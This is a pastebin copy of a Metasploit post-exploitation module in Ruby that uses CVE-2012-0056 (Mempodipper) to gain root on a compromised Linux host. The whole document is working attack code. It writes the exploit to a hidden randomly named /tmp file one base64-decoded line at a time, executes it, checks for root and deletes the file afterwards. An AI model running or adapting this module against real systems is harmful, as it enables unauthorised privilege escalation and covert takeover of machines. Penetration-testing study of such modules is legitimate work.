
Untitled

a guest Jan 26th, 2012 975 Never
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Exploit CVE-2012-0056 to get root',
      'Description'   => %q{ This module tries to elevate your privileges by exploiting CVE-2012-0056},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'mak' ],
      'Version'       => '$Revision$',
      'Platform'      => [ 'linux' ],
      'SessionTypes'  => [ 'shell' ], # no meterpreter for now?
    ))
  end

  def run
    print_status("Using CVE-2012-0056 to elevate privs on session #{session.inspect}...")

    if is_root?
      print_status "Already root, so no need to upgrade permissions. Aborting."
      return
    end

    # Both tools must be present on the target; abort if either lookup is empty.
    objdump_bin = cmd_exec("which objdump")
    ruby_bin = cmd_exec("which ruby")

    if [objdump_bin, ruby_bin].any? { |x| x.empty? }
      print_error "This exploit is useless without both objdump and ruby on the owned machine"
      return
    end

    # Hidden, randomly named script path under /tmp.
    sploit_file = "/tmp/." + Rex::Text.rand_text_alpha(8) + '.rb'

    print_status "Copying exploit to #{sploit_file}, it may take a while"

    begin
      ::Timeout.timeout(240) do

        # Write the script to the target one base64-encoded line at a time.
        generate_exploit().split("\n").each do |l|
          l = Rex::Text.encode_base64(l)
          cmd_exec("echo #{l} | base64 -d >> #{sploit_file} ; echo '' >> #{sploit_file}")
        end

        print_status "Launching exploit..."

        cmd_exec("ruby #{sploit_file}")

      end
    rescue ::Timeout::Error
      print_error "mempodipper: failed due to timeout"
    rescue
      print_error "mempodipper failed. Check the session log."
    end

    if is_root?
      print_good "Got root. Nice."
    else
      print_error "Sorry, Mempodipper failed."
    end

    # Remove the staged script whether or not the attempt succeeded.
    cmd_exec "rm #{sploit_file}"
  end

  # Read the exploit script shipped in the framework's data directory.
  def generate_exploit

    file = ::File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-0056.rb")

    met = ::File.open(file, "rb") { |f|
      f.read(f.stat.size)
    }

    return met

  end
end